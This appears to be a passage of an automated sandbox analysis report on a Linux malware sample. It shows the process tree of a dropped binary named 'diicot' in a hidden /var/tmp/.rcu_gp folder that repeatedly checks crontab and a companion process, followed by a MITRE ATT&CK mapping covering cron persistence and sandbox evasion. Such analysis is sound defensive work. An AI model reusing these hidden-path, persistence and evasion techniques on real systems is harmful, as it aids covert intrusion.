- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1820
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1821
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1822
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1823
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1824
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1825
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1826
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1827
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1829
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1828
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1830
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1831
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1832
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1833
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1834
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1835
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1836
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1837
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1838
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1839
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1840
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1841
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1842
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1843
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1844
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1845
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1847
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1846
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1848
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1849
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1850
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1851
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1853
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1852
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1854
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1855
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1856
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1857
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1859
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1858
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1860
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1861
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1862
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1863
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1865
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1864
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1866
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1867
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1868
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1869
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1871
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1870
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1872
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1873
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1874
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1875
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1877
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1876
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1878
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1879
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1880
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1881
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1883
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1882
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1884
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1885
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1886
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1887
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1889
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1888
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1890
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1891
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1892
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:1893
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1895
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1894
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1896
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1897
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1898
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1899
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1901
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1900
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1902
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1906
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1907
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1908
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1910
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1909
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1911
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1912
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1913
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1914
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1916
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1915
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1917
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1918
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1919
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1920
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1922
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1921
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1923
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1924
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1925
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:1926
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1928
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1927
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1929
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1930
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1931
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1932
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1934
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1933
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1935
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1936
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1937
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1938
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1940
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1939
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1941
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1942
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1943
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1944
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1946
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1945
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1947
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1948
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1949
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1950
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1951
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1952
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1953
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1954
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1955
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1956
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1958
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1957
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1959
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1960
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1961
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1962
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1964
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1963
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1965
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:1966
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:1967
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    PID:1968
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:1970
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1969
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:1971

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1638

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Persistence

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion

T1497

System Checks